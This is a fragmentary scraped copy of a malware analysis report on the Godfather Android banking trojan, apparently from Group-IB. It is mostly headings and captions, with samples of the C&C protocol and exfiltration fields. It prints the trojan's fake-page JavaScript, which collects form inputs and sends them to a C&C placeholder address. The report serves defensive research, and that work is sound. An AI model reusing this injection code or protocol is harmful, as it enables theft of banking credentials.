Artem Grischenko
Junior Malware Analyst
Key Findings
Godfather’s international targets
Figure 1: Who and where Godfather targets
Gone but not forgotten: Anubis, we recognize you
Comparison of Godfather and Anubis
Figure 3: A Telegram user asking for a review of the Godfather banking trojan
Figure 4: Godfather’s network infrastructure, as detailed by Group-IB’s Graph Network Analysis tool
Figure 5: Replicated DNS A records for Godfather's C&C addresses
Figure 6: Screenshot of malicious application linked to Godfather distribution in Google Play Store (Source: @0xabc0)
Godfather’s responsibilities
Figure 7: Google Protect animation
Technical findings
Checking system language and context
Initialization of SharedPreferences parameters
A service for requesting access to AccessibilityService
A service for communicating with the C&C server
Network communication
Figure 8: Communication between Godfather and C&C addresses
Figure 9: Example of Telegram channel with encrypted C&C address
RatCommandRequest
{country=us, new=true, ver=8.1.0, accessibility=true, ag=Mozilla/5.0 (Linux; Android 8.1.0; Google Pixel 2 Build/OPM6.171019.030.E1; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.186 Mobile Safari/537.36, applist=com.rigbak.adnam2|||, startnow=0, replay=true, eyes=1, logd=new, sim=(Android, app_perm_check=false, batterycharging=xx, sms_value=0, model=Google Pixel 2 (vbox86p)(i686), tag=PTS, perm_all=0, key=XQFGCGFTWXMH6PC}
InjectCommandRequest
{inject_check=true, key=XQFGCGFTWXMH6PC}
Data exfiltration
{number=true, page=1, message=f8d2382f72890b1975e1f149d07fdd3c36fff1d523e4ea83b2b1f593f956e7a0, key=D5GL78W1ESCYN7P}
page
message
1
The field contains one of the following:
2
Information about events tracked by the keylogger:
This request is executed if the size of the collected information exceeds 12,000 bytes.
4
Information about received SMS messages (the new, September 2022 version does not have this feature).
5
Contents of fields used for entering PINs or passwords.
AccessibilityService
Proxy module
VNC module
Figure 10: How Godfather connects to remote VNC clients
ScreenCapture module
--*****\r\nContent-Disposition: form-data; name=\"myfile\";filename=\"%FILENAME%\"\r\n\r\n%FILE_CONTENT%\r\n--*****--\r\n
WebSocket module
Web-fake module
function submit_data(form) {
var json = {};
for( var i = 0 ; i < form.length ; i++ )
{
var input = form[i];
if ( input.type == "submit" )
continue;
json[ form[i].name ] = form[i].value;
}
logs = ""
$.each(json, function(i, v) {
logs = logs + "" + i + ":" + v + "//br//";
});
top['closeDlg'] = true;
var url = '%C2%';
var imei_c = '%KEY%|%LOCALE%';
location.replace(url + '/sender_new.php?p=' + imei_c + "|Injection_10|%PACKAGE_NAME%|" + logs+'|918')
}
Conclusion
Recommendations on how to protect against Godfather
If you found this article helpful, share it with your friends!